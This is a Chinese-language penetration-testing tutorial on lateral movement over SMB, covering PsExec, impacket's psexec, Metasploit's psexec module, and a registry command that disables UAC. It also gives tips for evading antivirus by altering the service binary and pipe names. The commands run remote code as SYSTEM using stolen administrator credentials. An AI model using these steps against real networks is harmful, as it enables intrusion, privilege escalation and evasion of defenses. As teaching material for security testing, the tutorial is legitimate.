一、SMB协议
1、简述:
1)SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通
——————
2)判断:445端口
——————
3)IPC$连接:走的445端口,功能即实现文件共享
【内网安全-横向移动】IPC$连接--->计划任务--->上线https://blog.csdn.net/qq_53079406/article/details/128899133?spm=1001.2014.3001.5501
2、工具:
PsExec、impacket-smbexec、services等
二、PsExec
1、简述:
1)PsExec:是一种轻量级 telnet-replacement,可用于在其他系统上执行进程,为控制台应用程序提供完全交互性,而无需手动安装客户端软件。
——————
2)(远程命令行工具)PsExec 最强大的用途包括对远程系统和远程启用工具(如 IpConfig)启动交互式命令提示符,否则无法显示有关远程系统的信息。
——————
3)注意:一些防病毒扫描程序报告一个或多个工具感染了“远程管理员”病毒。 PsTools 中没有含有病毒,但它们已被病毒使用,这就是为什么它们触发病毒通知的原因
——————
4)使用条件:
目标开启ipc$ (该共享默认开启,依赖445端口),连接到admin$
ipc$连接需要账号密码(工作组:使用管理员、域环境:使用域用户/域管理员、域控:使用域管理员)
目标防火墙开发445端口(默认禁止连接)
杀软检测不出被病毒使用(微软自带的,在白名单里)
——————
5)官方文档:
PsExec - Sysinternals | Microsoft Learnhttps://learn.microsoft.com/zh-cn/sysinternals/downloads/psexec用法
psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-r servicename][-h][-l][-s|-e][-x][-i [session]][-c executable [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
文档中包含相关参数
2、使用:
1、常用参数:
-u 用户名,如果在域内:域\用户名 -p 密码 -accepteula 第一次运行不弹出确认框 -s system权限运行 -i 运行该程序,以便它与远程系统上指定会话的桌面进行交互。如果没有指定会话,进程将在控制台会话中运行 (-i cmd = cmd.exe) (账号密码 = -hashes :$HASH$)
2、情况:
情况一:未建立IPC$的情况
1、建立连接,并以管理员运行cmd.exe .\PsExec.exe -accepteula \\*.*.*.* -u administrator -p 密码 -s cmd.exe /c "命令如whoami"
——————
情况二:已经建立IPC$的情况
1、建立正常连接 net use \\192.168.*.*\ipc$ "密码" /user:"Administrator" 2、已建立连接后 .\PsExec.exe -accepteula \\*.*.*.* -s cmd.exe /c "whoami"
3、插件
cs-psexec
三、PsExec(impacket)
1、简述:
1、impacket:
1)简述:Impack是一组用于处理网络协议的Python类的集合。Impack专注于提供对数据包的低级编程访问,并为某些协议(例如SMB1-3和MSRPC)提供协议实现本身。数据包可以从头开始构建,也可以从原始数据中解析,面向对象的API使处理协议的深层层次结构变得简单。该库提供了一组工具作为示例,说明可以在该库的上下文中完成什么
——————
2)项目地址:
exe版本:
maaaaz/impacket-examples-windows: The great impacket example scripts compiled for Windows (github.com)https://github.com/maaaaz/impacket-examples-windows——————
py版本:
mirrors / SecureAuthCorp / impacket · GitCodeImpacket is a collection of Python classes for working with network protocols. 🚀 Github 镜像仓库 🚀 源项目地址 https://gitcode.net/mirrors/SecureAuthCorp/impacket?utm_source=csdn_github_accelerator
3)UAC(User Account Control:用户账户控制):(从Win7开始)Windows系统引入的一种新的安全机制,这是一种通知用户是否对应用程序使用硬盘和系统文件授权,从而防止恶意程序损坏系统的机制
Windows) 用户帐户控制 ( | Microsoft Learnhttps://learn.microsoft.com/zh-cn/windows/security/identity-protection/user-account-control/user-account-control-overview界面操作:
Win10中关闭UAC方法:控制面板--->用户账户--->更改用户账户控制设置--->对话框中设置合适的等级(最低:从不通知)
——————
命令操作:
# 管理员运行cmd,输入以下命令(参数0为关闭,1为恢复默认) C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4)RID:
RID=1000+:指派给用户、计算机和组
RID=500-999:保留起来、表示在每个Windows计算机和域中
2、PsExec-impacket
1、简述:
1)相关参数
1、lget {file} #下载目标机器中的文件。 2、lput {src_file, dst_path} #上传文件到目标机器。 3、-codec #解码命令执行的返回结果
——————
2)原理:通过smb上传一个服务程序到c:\windows(ADMIN$)目录,服务程序通过管道进行后续的命令执行的输入输出
——————
3)注:原版psexec.py上传会被拦截,需要绕过杀软(需要对服务程序修改尝试绕过杀软,如修改管道名称--->重新生成RemComSvc--->转成hex)
——————
4)命名:上传会随机英文字符串,使用PsExec.py提供的参数命名(防止名字容易被察觉异常)
2、使用:
1、工具的准备(impacket中,服务程序位于/impacket/examples/remcomsvc.py文件中(二进制数据),需要修改其中的二进制数据绕过杀软)
1、通过IPC$(smb协议)建立连接、上传服务程序到c:\windows(ADMIN$)目录(管理员权限,且防火墙端口开放)
2、打开管道,连接目标服务控制管理器SCM,创建、启动服务(serviceinstall.py进行服务安装),通过管道进行命令执行的输入输出,命令执行结束。
3、重新连接服务控制管理器,停止并删除服务、并删除服务程序
四、MSF
1、简述:
1)特点:安全漏洞检测工具、数千个软件漏洞(不断更新)
2)功能:信息收集、漏洞探测、漏洞利用等(即渗透测试的全流程)
3)GitHub:
rapid7/metasploit-framework: Metasploit Framework (github.com)https://github.com/rapid7/metasploit-framework
4)下载最新版本:
夜间安装程序|Metasploit文档渗透测试软件,渗透测试安全性https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
2、使用:
1)搜索相关模块
search psexec
2)使用模块
use exploit/windows/smb/psexec (或者use +序号)
3)配置、运行
show options #查看相关配置 set rhosts 192.168.*.* #目标主机 set smbuser administrator #用户名 set smbpass 111111 #密码 exploit #运行 (会出现meterpreter >)
4)命令执行
输入shell meterpreter >shell (获得system权限的shell,进行相关命令执行)
版权归原作者 黑色地带(崛起) 所有, 如有侵权,请联系我们删除。